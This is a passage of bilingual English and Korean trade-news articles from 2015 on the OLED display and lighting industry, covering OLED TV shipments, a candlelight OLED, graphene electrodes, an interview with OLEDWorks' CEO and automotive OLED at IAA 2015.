이러한 smart system은 energy reporting과 remote and preventive maintenance, personal lighting control, zone analysis 등이 가능하게 되어 energy절감과 유지비용 감소, workspace환경 최적화를 할 수 있으며 특히 zone analysis는 조명이 사용된 공간의 데이터분석을 통해 새로운 용도를 창출 가능하여 앞으로의 조명산업의 핵심이 될 것이라고 강조하였다.

Reviewing 2015 OLED Industry through Keywords

  1. OLED TV

OLED TV, first released in Q4 2013, recorded approximately 50,000 units of shipment each in Q1 and 2 this year. The shipment increased to 100,000 units in Q3, more than twice the amount of each quarter in H1 2015. As it is estimated that close to 200,000 units were released in Q4, over 90% of LG Display’s 2015 target is expected to be achieved. This is considered to be showing price competitiveness against other TV as the price of OLED TV fell to 1/2 of the initial price and effectiveness of aggressive marketing emphasizing the advantages of OLED TV compared to newly released LCD TV. In Q3 earnings results announcement, LG Display revealed their plan of 1,000,000 units of OLED TV panel shipment in 2016 and forecast OLED TV’s growth. For the industry, 2015 has been the year that secured foothold for OLED TV’s market expansion.

 

  1. Galaxy S6 Edge

At the time of Galaxy S6 and Galaxy S6 Edge’s release, Samsung Electronics estimated the initial supply to be 50:50. However, Galaxy S6 Edge showed 70% in actual demand and this led to shortage in supply. Samsung Display met the demand by starting flexible AMOLED line operation earlier than scheduled. 2015 proved future market growth potential by opening consumers’ wallets through designs possible only with flexible AMOLED panel.

 

  1. Samsung Display Supply Diversification

During the Q3 earnings announcement, Samsung Display revealed their plan to expand non-Samsung clients by 30%. Accordingly, in Q3, when smartphone market’s growth was expected to slow down, the sales performance improved by 13% compared to its previous quarter through key client’s new product release and expansion of client base. Particularly, the market occupation of AMOLED panel shipped toward China is analyzed to have increased within the global mobile market as Chinese set companies released AMOLED panel equipped smartphones.

 

  1. Apple’s OLED Application

Apple, which has been using LCD panel for all products, first applied flexible AMOLED panel, produced by LG Display, to 2015 smartwatch Apple Watch and drew much attention. In H2, Apple diversified suppliers by using Samsung Display’s flexible AMOLED panel. This move is analyzed to be groundwork for flexible OLED application to smartphone following smartwatch. 2015 has been a year with much interest in when flexible AMOLED panel equipped iPhone will be released.

 

  1. OLED Lighting

Global OLED lighting industry went through a great transformation in 2015. OLEDWorks announced they will acquire key parts of Philips’ OLED lighting business, relevant production facilities, and intellectual property. With this take over, OLEDWorks greatly expanded business through widened product portfolio and simultaneous lighting panel mass production in the US and Germany. LG Chem. transferred OLED lighting business to LG Display. The value of transfer is 1.6 billion KRW, and it is seen to be a strategy to increase competiveness by transferring the business to LG Display with their OLED panel mass production knowledge and to focus on existing materials business. The take over and business transfer of the main players in OLED lighting industry, OLEDWorks and LG Chem., are following their own business strategy. However, following these moves, related investment is expected to be delayed for some time and eyes are on how these will affect the OLED lighting business overall.

 

키워드로 돌아보는 2015 OLED 산업

  1. OLED TV

2013년 4분기부터 출시된 OLED TV는 2015년 1, 2분기에 각 약 5만대가 출하되었고 3분기에 10만대가 출하되면서, 3분기에만 상반기 각 분기별 출하량의 약 두 배 이상을 출하했다. 또한 4분기에도 20만대 가까이 출하한 것으로 예상되어 LG Display의 2015년 목표의 약 90%이상이 달성될 것으로 예상된다. 이는 OLED TV의 가격이 초기 가격의 절반 가량으로 하락하면서 다른 TV와의 가격 경쟁력이 생겼고, 새롭게 출시되는 LCD TV보다 OLED TV의 장점을 부각시키는 공격적인 마케팅이 시장에서 발휘되고 있다는 신호로 보인다. LG Display는 지난 3분기 실적발표회에서 2016년 OLED TV용 패널 출하량을 100만대로 발표하면서 OLED TV의 성장을 예고했다. 업계 관계자들에게 2015년은 OLED TV의 시장 확대의 발판을 마련한 시기였다.

 

  1. Galaxy S6 Edge

Samsung Elec.은 Galaxy S6와 Galaxy S6 Edge를 출시할 당시 초기 물량을 5대5로 예상했었다. 하지만 실제 수요량에서 Galaxy S6 Edge가 70%를 차지하면서 공급 부족 현상이 일어났다. 때문에 Samsung Display에서 flexible용 AMOLED line을 예상 시점보다 앞당겨 가동하여 수요량을 충족시킬 수 있었다. 2015년은 flexible AMOLED 패널로만 구현할 수 있는 디자인으로 소비자들의 지갑을 열게 하여 앞으로 시장 성장성을 증명해 준 한 해였다.

 

  1. Samsung Display 공급 다변화

Samsung Display는 지난 3분기 실적발표회에서 외부 거래선을 30% 확대할 계획을 밝혔다. 이에 따라 smart phone 시장의 성장 둔화가 예상되었던 3분기에 주요 거래선의 신제품 출시와 공급처 확장을 통해 매출 기준 지난 분기 대비 13% 성장의 실적 개선을 이루었다. 특히 중국향 AMOLED 패널은 중국 set 업체들의 AMOLED 패널을 탑재한 smart phone의 출시가 되면서, 세계 모바일 시장에서 점유율이 늘어난 것으로 분석된다. 2015년의 Samsung Display 공급 다변화는 Samsung Display의 실적을 다시 성장세로 올리면서 AMOLED 패널이 모바일 display 시장 규모를 확대할 수 있었다.

 

  1. Apple OLED 적용

지금까지 모든 제품에 LCD 패널을 적용해왔던 Apple이 2015년에 출시된 smart watch제품인 Apple watch에 LG Display의 flexible AMOLED 패널을 처음으로 적용하여 큰 관심을 모았으며, 하반기에는 Samsung Display의 flexible AMOLED 패널도 공급받음으로써 공급업체 다변화를 이루었다.  Smart watch에 이어서 smart phone에도 flexible OLED를 적용하기 위한 포석으로 분석되며, flexible AMOLED 패널이 적용된 iPhone의 출시 시점에 대한 관심이 높았던 한 해였다.

 

  1. OLED Lighting

2015년 전세계 OLED 조명 산업은 큰 변화를 겪었다. OLEDWorks는 Philips의 OLED lighting 핵심 사업부와 관련된 생산시설, 지적 재산권을 인수한다고 발표했다. 이번 인수로 제품 포트폴리오를 넓히고 미국과 독일에서 동시에 조명 패널을 양산하는 등 사업규모를 크게 확장했다. 또한 LG Chem.은 OLED 조명 사업을 LG Display에 양도했다. 양도가액은 1,600억원으로 OLED 패널 양산에 대한 노하우가 풍부한 LG Display에 관련 사업을 이관해 경쟁력을 높이고 기존 소재 사업에 더 집중하겠다는 전략으로 분석된다. OLED 조명 산업의 main player인 LG Chem.과 OLEDWorks의  사업 양도와 인수는 각 사업전략에 따른 것이지만 이에 따라 당분간은 관련된 투자가 지연될 것으로 보이며 이런 움직임들이 OLED 조명 산업 전반에 어떤 영향을 줄지 관심이 모아지고 있다.

NTHU is reshaping the lighting world via Candlelight OLED

Numerous researches have been sounding alarm with increasing frequency on the health hazards of blue light. They report that blue light possesses potential hazard to the retina of human eyes, circadian rhythm, melatonin secretion, and cancer risk.

 

To devise a human-friendly light source and to also trigger a “Lighting Renaissance”, the Prof. Jou’s OLED research group from National Tsing Hua University (NTHU), Taiwan, demonstrates a high light quality and blue-hazard free candlelight OLED, that serves as a good measure and a wisely choice for general lighting. Just before Christmas, the candlelight OLED has won the International Dark-Sky Association Lighting Design Award and Domestic golden lighting medal. Moreover, Taiwan’s government highlights and entirely promotes NTHU and WiseChip Semiconductor Inc. to further investigate candlelight OLED technology via the highest Ministry of Economic Affairs support in following two years. It’s surely confirmed that the health-friendly candlelight OLED can be commercialized, accessible and affordable for human mankind by the end of 2017.

 

Additionally, the IDA website announced that “Since 2006, Prof. Jou has worked with students on organic LED (OLED) lighting technologies in an effort to create lighting that minimizes negative impacts to human health. In this work, he and his research team has made numerous breakthroughs, such as the creation of very low color temperature OLED, sunlight-style OLED, pseudo-natural light OLED, and candlelight-style OLED devices. Their candlelight-style OLED has attracted a considerable attention from both academia and industries. Most importantly, the candle-like OLED has also been praised by medical experts and is considered one of the safest electricity-driven lighting sources. This lighting can be used in both indoor and outdoor applications.”

 

Upcoming lighting industrial trends should be psychological- and physiological- friendly lighting sources. Currently, the gross production value of OLED up to 4,000 billion US dollars.

 

Candlelight OLED, Source: NTHU

Candlelight OLED, Source: NTHU

 

Professor Jou's Research Team, Source: NTHU

Professor Jou’s Research Team, Source: NTHU

 

IDA Received by Professor Jou's Research Team, Source : NTHU

IDA Received by Professor Jou’s Research Team, Source : NTHU

NTHU, Candlelight OLED를 통해 미래 조명에 대한 개발 방향을 제시하다.

최근 청색광과 관련된 건강상의 위험에 대한 우려와 관심이 증가되고 있다.  특히 청색광이 망막과 멜라토닌 분비, 암 발병의 원인이 될 수 있다는 내용의 연구결과가 발표되고 있다.

이와 관련해 대만 NTHU (National Tsing Hua University)의 Jou 교수 OLED 연구팀은 청색광을 배출하지 않는candlelight(촛불) OLED조명을 개발했다. Candlelight OLED는 2015년 IDA(International Dark-Sky Association) Lighting Design Award와 Domestic golden lighting medal을 수상하며 주목을 받았으며, 대만 정부는 NTHU와 WiseChip Semiconductor가 candlelight OLED기술을 연구하는데 앞으로 2년동안 지원을 아끼지 않을 예정이라고 밝혔다. 2016년 말까지는 저렴하게 누구나 이용할 수 있게 상용화될 예정이다.

IDA는 2006년부터 Jou교수가 낮은 색온도의 OLED와 태양광과 흡사한 OLED, 자연광 스타일의 OLED, 촛불 모양의 OLED 기구를 개발하며 건강에 부정적인 영향을 최소화하는 이슈에 대해 많은 돌파구를 만들어냈다고 밝혔다. 이번에 개발한 candlelight OLED는 학계뿐만 아니라 업계에서도 상당한 주목을 받고 있다. 특히, 의료계 전문가들은 이 조명을 가장 안전한 전기 구동 광원 소자 중 하나로 평가했다.

인체에 무해한 광원은 앞으로의 조명 산업 트렌드가 될 것으로 전망되며, 이러한 측면에서 candlelight OLED가 미래 조명에 대한 개발 방향을 제시해줄 수 있을지 관심이 모아지고 있다.

Candlelight OLED, Source: NTHU

Candlelight OLED, Source: NTHU

Jou 교수 연구팀, Source: NTHU

Jou 교수 연구팀, Source: NTHU

Jou 교수 연구팀에서 수상한 IDA, Source : NTHU

Jou 교수 연구팀에서 수상한 IDA, Source : NTHU

ETRI Reveals Graphene Applied OLED Lighting

At R&D Korea 2015 (November 19-21), ETRI (Electronics and Telecommunications Research Institute) revealed OLED lighting and graphene related research results.

 

Since 2013, ETRI has been participating in ‘Graphene Applied OLED Device/Panel Technology Development’ project as a supervising organization. This project is a part of ‘Graphene Device/Component Commercialization Technology Business’, which is a Korean national project. This project’s ultimate aims include development of graphene electrode material with ≥15Ω sheet resistance, ≥90% transmittance, 3nm thickness, ≤5% sheet resistance uniformity, ≤5nm surface profile, and ≥5.5 generation area, graphene based protection layer that can be used for 5.5 generation 55inch OLED panel with ≤10-6 g/m2 WVTR, graphene anode OLED with ≥90% external quantum efficiency compared to ITO anode OLED, and diagonally 1300mm OLED panel prototype.

 

ETR1

 

In this exhibition, ETRI presented OLED lighting that used graphene as the electrode. ETRI’s Dr. Jeong-Ik Lee explained that recently interest in graphene electrode is increasing to replace ITO electrode and to apply graphene electrode, optical, electrical, and process issues have to be considered. When graphene is used as OLED electrode instead of ITO, thickness and refractive index change optically and electrically energy levels change, and these have to be considered when designing. He also emphasized that in terms of process, it has to be designed keeping in mind of before and after process of electrode procedure. Dr. Lee revealed that at present optical and electrical issues are solved while the process issues are in research stage, and they are planning to present the results of this research within this year.

 

Graphene, with its high resistivity, is known as next generation electrode material favorable to flexible and foldable. Dr. Lee pointed out that graphene has wider viewing angle than ITO when used as transparent electrode is another important advantage, and particularly as white light source’s spectrum cannot change according to the viewing angle, graphene is suitable for application.

 

Graphene is a key material with a wide arrange of applications, it is being developed in diverse areas such as OLED encapsulation as well as in electrode sector. The Ministry of Science, ICT and Future Planning of Korea estimated that domestic graphene market will record 19 billion KRW until 2025. Korea Evaluation Institute of Industrial Technology, the organization in charge of this national project, gave their target as developing 9 top technology through graphene and achieve 17 billion KRW sales. Regarding this, Dr. Lee emphasized compared to other countries, Korean investment in graphene is relatively low and that now is the time for the Korean corporations and government agencies to pay more attention higher value-added businesses.

ETRI, 그래핀을 적용한 OLED 조명 공개

11월 19일부터 21일까지 개최된 2015 대한민국 산업기술 R&D 대전에서 ETRI(한국전자통신연구원)은 OLED 조명과 그래핀과 관련된 연구 성과를 공개했다.

ETRI는 2013년부터 ‘그래핀 소재/부품 상용화 기술 사업’ 국책과제 중 세부 과제인 “그래핀 응용 OLED 소자/패널 기술개발”의 주관 기관으로 참여하고 있다. 이 과제의 최종 목표는 면저항 15Ω 이상이며 투과도 90% 이상, 두께 3nm, 면저항 균일도 5% 이하, 표면조도 5nm이하, 면적은 5.5세대 이상인 그래핀 전극 소재와 WVTR 10-6 g/m2이하, 면적은 5.5세대에 55인치 OLED 패널 적용 가능 수준인 그래핀 기반 방진막 소재, ITO 양극 OLED 대비 외부광자효율이 90%이상인 그래핀 양극 OLED, 그래핀이 적용된 대각 사이즈 1300mm 이상의 OLED 패널 시제품 개발이다.

ETR1

이번 전시회에서 ETRI는 그래핀을 전극으로 적용한 OLED 조명을 공개하였다. ETRI의 이정익 박사는 “최근 ITO전극을 대체하기 위해 그래핀 전극에 대한 관심이 높아지고 있다. 그래핀 전극을 적용하기 위해서는 광학적, 전기적, 공정적인 요소를 고려해야 한다.”며, “ITO 대신 그래핀을 OLED 전극으로 사용할 경우 광학적으로는 두께와 굴절률이 바뀌며, 전기적으로는 에너지 준위가 바뀌기 때문에 이를 고려해서 설계를 해줘야 한다. 또한 공정적으로는 전극 공정의 전후 공정과 맞추어 설계해야 한다.” 라고 강조하였다. 또한 현재 광학적, 전기적 문제들은 해결된 상태이며 공정적인 문제를 연구 중에 있고, 올해 안에 공정 문제 해결과 관련된 연구 결과를 공개할 예정이라고 밝혔다.

그래핀은 resistivity가 높기 때문에 flexible과 foldable에 유리한 차세대 전극 재료로 알려져 있다. 이정익 박사는 “그래핀이 resistivity가 높을 뿐만 아니라 투명전극으로 쓰일 때 ITO에 비해 시야각이 넓다는 것도 중요한 장점이며, 특히 백색광원은 시야각에 따라 spectrum이 바뀌면 안되기 때문에 그래핀이 적용되기 좋다.” 라고 밝혔다.

그래핀은 응용범위가 넓은 핵심소재로서 전극 뿐만 아니라 OLED의 encapsulation등 다양한 분야로 개발되고 있다. 미래창조과학부는 2025년까지 국내 그래핀 시장이 19조까지 성장할 것으로 예측했으며, 이번 국책과제의 전담기관인 한국산업기술평가관리원은 그래핀을 통해 9개의 세계 1등 기술을 개발하고 17조원의 매출을 달성하겠다는 목표를 내세웠다. 이와 관련하여 이정익 박사는 “외국에 비해 국내의 그래핀에 대한 투자는 아직 적은 편이며, 국내 기업과 정부 기관이 고부가가치 산업에 좀더 관심을 기울일 때”라고 강조하였다.

[Expert Talk] OLEDWorks’ Co-founder David DeJoy Talks New Lighting Experience

Through an interview with OLEDNET and his presentation during the OLEDs World Summit (October 27-29), OLEDWorks’ co-founder, chairman and CEO David DeJoy discussed OLEDWorks’ vision and OLED lighting.

 

OLEDWorks hit the headlines in April this year when it was announced they would acquire key OLED assets and relevant intellectual property from Royal Philips whose main OLED product is Lumiblade. This acquisition was finalized earlier this month, taking this relatively small but already dynamic player within the OLED lighting industry to another level with plans that include continuing production in both Germany and the US, and expanding the product portfolio.

 

As the world’s first area light source, OLED lighting is naturally diffusive. As the light is uniform without flickers, the glare and eye fatigue is minimized. Although it is similar to LED in that it is a solid-state lighting, OLED produces little heat and color temperature can be easily adjusted. With its thinness of the panel and no need for extra installation space, OLED lighting can bring forth new design perspectives and applications. During his talk, DeJoy commented that OLED will bring the light closer to the user and will deliver a better light experience in diverse settings including patient rooms, recovery rooms in hospitals, retail, and museums.

 

Although customer response to OLED light quality is extremely positive, DeJoy acknowledged that it is facing many challenges in entering the lighting market and divided the strategy to overcome this into “the four ‘A’s”: awareness, adaptability, availability, and affordability.

 

The ‘awareness’ includes education about the technology and benefits, as well as confidence in the OLED lighting technology reliability. The effort to build the OLED lighting awareness includes government partnerships such as DOE Funded Gateway Projects, and NYSERDA Demonstration Projects. Designers and architects are also increasingly turning to OLED for inspiration and source material. OLED lighting’s previously mentioned advantages are closely linked to the second ‘A’, ‘adaptability’. Its thinness, lack of heat, and no need for additional installation space mean that OLED lighting can easily be integrated into fixtures and used as a building material by being directly mounted on surfaces. On the subject of ‘availability’, DeJoy emphasized that more luminaire and final products should become more available to specifiers. He added that there are many in product development but they need to get into the hands of the end user. Discussing the ‘affordability’ of OLED lighting, DeJoy used OLED panel cost scenario published by the US Department of Energy which estimates that the panel price will continue to fall to reach US$10/klm, which corresponds to approximately US$100/m2, in 2025. DeJoy added that when examining the affordability of OLED lighting, the total cost has to be considered. For example, OLED lighting does not require heat sink or extra installation cost. Also, many applications do not need very high lumen output with focused beams; “it is not all about $/klm”.

 

Source: US Department of Energy

Source: US Department of Energy

 

DeJoy explained that OLEDWorks long term goal is making OLED lighting adaptable and available, making it easier to change the lighting when it is broken, and be user friendly. He reported that OLEDWorks will continue to expand the product portfolio, which now includes Lumiblade, for “increased performance, additional form factors, and additional CCT options, while reducing product costs”. DeJoy also added that this is “akin to the LED evolution and consistent with the U.S. Department of Energy forecast”. With their proactive and enthusiastic approach to the OLED lighting market, the industry is watching OLEDWorks with great interest. OLEDWorks’ effect on OLED lighting market is expected to be significant.

[인물 탐방]OLEDWorks의 공동 설립자 DeJoy, OLED가 가져올 새로운 경험에 대하여 이야기하다.

OLEDWorks의 공동 설립자이자 회장이며 CEO를 맡고 있는 David DeJoy는 10월 27일부터 29일까지 진행된 OLEDs World Summit에서의 발표와 OLEDNET과의 인터뷰를 통해 OLEDWorks의 비전과 OLED 조명에 대한 견해를 밝혔다.

올해 4월에 OLEDWorks는 Philips의 OLED lighting 핵심 사업부와 관련된 생산시설, 지적 재산권을 인수한다고 발표해 큰 화제를 모았다. 인수는 이번 달 초에 완료되었다. OLED 조명산업에서 OLEDWorks는 상대적으로 규모가 작은 업체로 알려졌었지만 이번 인수로 제품 포트폴리오를 넓히고 미국과 독일에서 동시에 조명 패널을 양산하는 등 사업규모가 크게 확장되었다.

OLED 조명은 세계 최초의 면광원으로서 자연적으로 확산되는 성질을 가졌다. 또한 불빛이 균일하고 플리커 현상이 없기 때문에 눈부심이 없고 안구의 피로가 최소화되는 장점이 있다. OLED는 solid-state lighting이라는 점에서 LED와 유사하지만 발열이 거의 없으며 색온도를 쉽게 조정할 수 있다는 점에서 차이가 있다. 패널의 두께가 얇고 추가적인 설치공간이 필요하기 때문에 OLED 조명은 새로운 디자인과 적용 분야를 가지고 올 것으로 보인다. DeJoy는 OLED는 사용자에게 빛을 더 가깝게 전해줄 것이고 병원의 병실과 회복실, 소매점, 박물관 등 다양한 공간에서 향상된 조명 경험을 가져다 줄 것이라고 전망했다.

OLED 조명에 대한 고객들의 반응은 매우 긍정적이지만 DeJoy는 조명 시장 진입에는 많은 도전이 직면해있음을 인정했다. 그는 “4A(Awareness, Adaptability, Availability, Affordability) 전략”이라는 이름의 4가지 전략을 통해 이를 극복할 것이라고 밝혔다.

‘Awarness(인지)’는 OLED 조명 기술 신뢰성에 대한 자신감과 기술이 가지고 있는 장점에 대한 교육 등을 의미한다. OLED 조명에 대한 인식을 쌓는 것은 미국 에너지부(DOE)가 모금하는 Gateway 국책과제들이나 NYSERDA(New York State Energy Research and Development Authority)가 주관하는 국책과제들과 같은 정부기관과의 협약도 포함하는 것이다. 디자이너와 설계자들 또한 서서히 건축의 영감이나 건축에 쓰이는 원재료로서 OLED를 주목하고 있다.

위에서 언급한 OLED 조명에 대한 장점들은 두번째 A인 ‘Adaptability(적응성)’와 밀접하게 연관되어있다. 발열이 없으며 얇고, 추가적인 설치공간이 필요하지 않는다는 점은 OLED 조명이 벽면에 직접적으로 설치되는 것과 같이 쉽게 건축자재로서 적용 가능하다는 것을 의미한다.

‘Availability’라는 주제에서 DeJoy는 더 많은 조명과 완성품들이 각각의 개인들에게 더 용이해져야 한다고 강조하면서 많은 제품 개발이 이루어지고 있지만 결국 중요한 것은 이런 제품들이 최종 사용자에게 전달되는 것이라고 밝혔다.

‘Affordability(경제성)’을 언급하며 DeJoy는 미국 에너지부에서 나온 OLED 패널 원가 시나리오를 인용했다. 이 시나리오에 따르면 패널의 원가는 2015년까지 1klm당 10$까지 떨어질 것이며 이는 1 m 2의 패널 면적당 100$에 해당한다. DeJoy는 OLED 조명의 경제성을 검토 할 때는 총 비용이 고려되어야 한다고 덧붙였다. 예를 들어 OLED 조명은 발열로 인한 에너지 손실이나 추가적인 설치비가 들어가지 않는다. 또한 OLED 조명이 적용되는 많은 제품들은 점광원이 아니기 때문에 높은 lumen 출력이 필요하지 않다. DeJoy는 이런 특성에 대해 설명하며 “1klm당 가격은 다른 조명들에 비해 상대적으로 높지만 이것이 전부는 아니다.”라고 강조했다.

OLED PANEL SCENARIO

Source: US Department of Energy

DeJoy는 OLEDWorks의 장기 목표가 OLED 조명의 적응성과 사용성을 높이는 것이며 조명이 파손되었을 때 교체하기 쉽게 사용자 친화적으로 제작할 것이라고 설명했다. 또한 “OLEDWorks가 Lumiblade를 포함한 제품 포트폴리오 확장을 지속하고 제품 가격 절감과 성능 향상, 다양한 형태의 조명을 제작할 것.”이라고 발표했다. 또한 “이것은 LED가 걸어온 길과 유사하며 미국 에너지부의 전망과 일치한다.” 라고 밝혔다.

ETRI’s Doo-Hee Cho Receives IEC 1906 Award

On October 23, ETRI (Electronics and Telecommunications Research Institute) Information & Communications Core Technology Research Laboratory’s Dr. Doo-Hee Cho received IEC 1906 Award at World Standards Day ceremony. The IEC 1906 Award recognizes exceptional current achievements and it is presented by the International Electrotechnical Commission, one of the top 3 international standards organizations.

 

Dr. Cho has been active in IEC since his involvement in 2009. The activities include serving as the president of IEC·TC34 (lighting)’s OLED working group and establishment of IEC 62866: Organic Light Emitting Diode (OLED) panels for general lighting – Safety requirements.

 

Founded in 1906, IEC is one of the top 3 international standards organizations along with ISO (International Organization for Standardization) and ITU (International Telecommunication Union) with 83 member countries. IEC established IEC 1906 Award in 2004. Since then they have been selecting industry’s experts with outstanding contribution to electrotechnical standardization and IEC development and presenting the award annually. With this award for Dr. Cho, acceleration to OLED lighting’s international standardization and OLED lighting business growth are anticipated.

 

IEC 1906 Award Badge

IEC 1906 Award Badge

 

 

IEC 1906 Award Certificate

IEC 1906 Award Certificate

 

조두희박사

Dr. Doo-Hee Cho

 

ETRI의 조두희 책임연구원 IEC 1906 Award 수상

한국전자통신연구원 (ETRI) 정보통신부품소재연구소 조두희 박사가 23일 ‘세계 표준의 날’ 기념식에서 세계 3대 국제표준기구로 꼽히는 국제전기기술위원회(IEC)의 공로상인 IEC 1906 Award를 수상했다.

지난 2009년부터 IEC에서 활동해온 조두희박사는 IEC·TC34(조명)의 OLED 워킹그룹 의장을 역임하며 OLED 조명의 표준화를 위해 IEC 62866: Organic Light Emitting Diode (OLED) panels for general lighting – Safety requirements를 제정하는 등 국제표준전문가로서 활발한 활동을 펼쳐왔다.

1906년에 설립된 IEC는 국제표준화기구(ISO), 전기통신연합(ITU)와 함께 세계 3대 표준 기구 중 하나로 83개국이 회원으로 참여하고 있으며 2004년부터 IEC 1906 어워드를 제정, 전기기술 분야 국제표준화 업적이 탁월하고 IEC 발전에 기여가 큰 전문가를 선정해 매년 시상하고 있다. 이번 조두희 박사의 수상을 계기로 OLED조명 국제 표준 제정에 속도가 더해지고, 아울러 OLED 조명 산업의 성장이 촉진될 것으로 기대된다.

IEC 1906 Award 뱃지

IEC 1906 Award 상장

 

조두희박사

LG Chem.’s OLED Lighting Business Toward LGD. What is the Future Direction?

It was announced that LG Display will take over LG Chem.’s OLED lighting business department. As the department that was leading the opening of OLED lighting panel market is being merged into LG Display, a significant change in OLED lighting industry is anticipated.

 

One of the merits of this merge is expected to be further improving OLED lighting panel’s mass production potential through LG Display’s existing OLED panel mass production line, labor, and technology. Additionally, when new investment of OLED lighting panel mass production line is being processed, time and cost can be reduced on the basis of LG Display’s manufacturing equipment/material supply chains.

 

On the other hand, as OLED lighting market is still in initial stages the size is not so large. As such, whether LG Display will newly invest is a key issue. Generally, for display panel companies that invest with market size of thousands of millions of dollars in mind, OLED lighting panel line’s new investment does not seem to have a great advantage for LG Display.

 

Therefore, if LG Display carries out OLED lighting panel business, the first step is estimated to be mass production in parts of Paju’s AP2 line rather than new investment for OLED lighting panel mass production line. If parts of AP2 line begin mass production first, mass production timing can be much sooner than new investment and can positively affect expansion of OLED lighting panel market.

 

The issue is marketing strategy. In 2009, Samsung Electronics successfully opened AMOLED smartphone market in Korea via push strategy using AMOLED themed music video that became viral. Much like this, in order to show profit in OLED lighting panel business, LG Display should open the market through push marketing strategy.

LGD로 가는 LG화학의 OLED 조명사업, 앞으로의 향방은?

LG화학의 OLED 사업부가 LG Display로의 통합이 결정된 것으로 알려졌다. OLED lighting panel 시장 개화에 가장 앞장섰던 LG 화학의 OLED lighting business가 LG Display로 통합되게 되면서 앞으로의 OLED lighting 산업에 큰 변화가 있을 것으로 전망된다.

이번 통합으로 긍정적인 점은 LG Display가 이미 보유하고 있는 OLED panel 양산 라인과 인력, 기술력을 바탕으로 OLED lighting panel의 양산성을 더욱 향상시킬 수 있을 것으로 예상된다. 또한 OLED lighting panel 양산라인의 신규투자를 진행할 때도 LG Display가 보유하고 있는 장비/재료 supply chain을 바탕으로 시간과 비용을 절감할 수 있다.

반면 OLED lighting 시장은 아직 초기단계로 시장규모가 크지 않기 때문에 LG Display에서 신규투자의 여부가 관건이다. 일반적으로 조 단위의 시장을 바라보고 투자를 하는 디스플레이 패널기업의 특성상 OLED lighting panel 신규라인 투자가 LG Display의 입장에서 큰 메리트는 없을 것으로 예상된다.

따라서 LG Display에서 OLED lighting panel 사업을 진행을 한다면 첫 시작은 OLED lighting panel 양산라인 신규투자보다 파주의 AP2 line 일부에서 양산을 먼저 시작 할 것으로 예상된다. AP2 line의 일부에서 먼저 양산을 시작한다면 신규투자를 하는 것보다 양산시점을 훨씬 앞당길 수 있고 OLED lighting panel 시장 확대에 긍정적인 영향을 끼칠 것으로 예상된다.

문제는 마케팅전략이다. 초창기 삼성전자가 “아몰레드” 마케팅으로 AMOLED smartphone 시장을 push전략으로 열었듯이 LG Display도 OLED lighting panel 사업에서 이윤을 남기기 위해서는 push 마케팅 전략을 통해 OLED lighting panel 시장을 열어야 할 것으로 분석된다.

[IAA 2015] Audi and Porsche, Propose Future Models of Smart Car

At IAA 2015 (September 17 – 27), Audi and Porsche presented OLED lighting and display equipped vehicles.

 

In the past, Audi has proved OLED technology’s excellence through diverse models and demonstrations, including introduction of ‘swarm’ in 2013 with its 3D OLED car rear lighting panels. At this motor show, Audi revealed Audi e-tron quattro, the first concept car with Matrix OLED technology. As well as the Matrix OLED lighting, interior OLED display was also applied to the concept car. Audi explained that the Matrix OLED lighting, which was applied to the rear lighting, can continuously change lights and does not cast shadow. Full OLED interface was also applied to the car and all functions required in driving can be control by display touch. Audi revealed that they will gradually apply these technology to next generation Audi series.

 

Porsche presented their first four-seat electric sports car Mission E as a concept model. The instrument cluster for this concept car is displayed virtually in OLED. The menu can be activated through buttons on the handle. It can also be automatically activated as the cluster’s eye tracking system can perceive the driver’s attention. The display also follows the seat position and body attitude of the driver in what is known as a parallax effect; the display moves according to the driver’s posture for easier viewing. Porsche revealed that Porsche Car Connect technology will also be applied which will allow the user to control key functions of the vehicle through a smartphone.

 

As OLED using lighting and display are actively applied to smart cars, attention on the automotive OLED is also increasing. At the National Research Development Industry General Workshop, held in July 2015, Samsung Display and LG Display each stated their thoughts on display that will be applied to future smart cars.

 

Samsung Display’s executive director Hye Yong Chu asserted that smart is display’s future, including smart car. She also explained that for the actualization of smart technology, other ancillary smart technology, such as eye tracking and voice recognition technology, are required.

 

Yoon Sooyoung, LG Display’s vice president, stated that automotive display can be used for CID, dashboard, cluster, and window, and that the development of transparent and flexible technology is necessary.

 

During the keynote session of IMID 2015, Munhyun Kim of Hyundai Motors revealed that OLED panels will mainly be applied to smart car compared to LCD as it can easily be flexible. He also added that the automotive OLED’s percentage within the total OLED market will increase, and anticipated that it will exceed 30% in 2017.

 

 

Porsche Mission E, Porsche Home page

Porsche Mission E, Porsche Home page

[IAA 2015] Audi와 Porsche, 미래의 스마트카의 모델을 제시하다.

17일부터 독일에서 개최된 2015 프랑크푸르트 모터쇼(IAA 2015)에서는 Audi와 Porsche가 OLED 조명과 디스플레이를 도입한 차량을 선보였다.

Audi는 과거 다양한 모델과 시연을 통해 OLED 기술의 우수성을 입증한 바 있다. 특히 2013년도에는 3차원 입체 OLED 디스플레이 기능을 가진 ‘SWARM’을 선보이기도 했다. 이번 모터쇼에서 Audi는 매트릭스 OLED 기술이 최초로 적용된 컨셉트카인 ‘Audi e-tron quattro’를 공개하였다. 컨셉트카에는 매트릭스 OLED lighting과 내부 OLED 디스플레이가 적용되었다. 매트릭스 OLED lighting은 후미등에 적용되었으며, Audi 측은 이 기술이 조광을 끊임없이 변화시킬 수 있으며 그림자를 발생시키지 않는다는 장점을 가지고 있다고 밝혔다. 또한 콘셉트카에는 풀 OLED 인터페이스가 적용되어 자동차 운행에 필요한 모든 기능들을 물리적인 버튼 없이 디스플레이 터치로 조작할 수 있다. Audi는 이번 콘셉트카의 기술들을 차세대 Audi 시리즈에 점차적으로 적용될 예정이라고 밝혔다.

Porsche는 이번 모터쇼에 Porsche 최초의 4인승 전기 스포츠카인 ‘Porsche Mission E’라는 이름의 컨셉트카를 공개하였다. 이 컨셉트카의 클러스터에는 OLED display가 장착되어 가상이미지로 정보가 표시된다. 운전자는 핸들에 장착된 버튼을 조작해 원하는 메뉴를 활성화할 수 있으며 클러스터가 운전자의 시선을 감지하는 아이트래킹 시스템이 있어 메뉴가 자동으로 활성화되기도 한다. 또한 디스플레이부에는 좌석의 형태와 운전자의 자세에 따라 변형되는 패럴랙스 효과도 구현하였다. 운전자의 자세의 높이에 따라 원형 게시판이 반응하여 운전자가 잘 볼 수 있도록 움직인다. Porsche 측은 스마트폰을 통해 차량의 주요 기능 설정이 가능하게 하는 ‘Porsche Car Connect’ 기술도 함께 적용할 것이라고 밝혔다.

